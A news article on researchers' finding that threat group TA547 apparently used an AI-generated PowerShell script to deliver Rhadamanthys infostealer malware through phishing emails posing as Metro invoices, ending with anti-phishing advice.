Cybercriminals Leverage AI for Stealthier Attacks: Researchers Flag AI-Generated PowerShell Script

Researchers have uncovered a novel tactic employed by cybercriminals: leveraging Artificial Intelligence (AI) to craft malicious code. The culprit, a threat group known as TA547, is suspected of using AI to develop a PowerShell script designed to deploy malware.

PowerShell is a powerful scripting language commonly used for system administration within Windows environments. Malicious actors often exploit PowerShell to execute commands remotely, allowing them to infiltrate systems and steal sensitive data.

The unique aspect of this case lies in the script's characteristics, which deviate from the usual human-written code. Security experts at Proofpoint, a cybersecurity firm, identified the script while investigating TA547's recent campaign. The script, responsible for delivering the Rhadamanthys information stealer malware, exhibited unusual formatting and commenting practices, suggesting potential AI involvement.

While definitive confirmation remains elusive, the script's peculiarities align with the capabilities of large language models, such as ChatGPT or Copilot. These AI systems possess the ability to generate code based on specific instructions. Security researchers theorize that TA547 might have utilized an AI tool to automate script creation, potentially aiming for increased efficiency and making detection more challenging.

The malware distribution campaign involved phishing emails targeting German organizations across various industries. The emails, masquerading as legitimate invoices from Metro, a German cash-and-carry giant, contained a password-protected ZIP archive. Once opened, the archive unleashed a malicious shortcut file (.LNK). Clicking on this file triggered the execution of the AI-suspected PowerShell script, which subsequently downloaded and installed the Rhadamanthys malware.

Rhadamanthys, a malware-as-a-service (MaaS) offering, has been gaining traction within cybercrime circles since its emergence in September 2022. MaaS models essentially provide pre-developed malware to other criminals for a fee, eliminating the technical barrier for aspiring attackers.

The suspected use of AI in crafting the PowerShell script signifies a concerning evolution in cyberattacks. AI-powered tools empower attackers to automate tasks, potentially accelerating their operations and making them more elusive. This development underscores the urgent need for cybersecurity solutions capable of identifying and mitigating threats generated by AI.

Security experts recommend vigilance against phishing attempts, regardless of the sender's apparent legitimacy. Verifying email authenticity through independent channels and avoiding interaction with suspicious attachments are crucial measures to prevent falling victim to such schemes.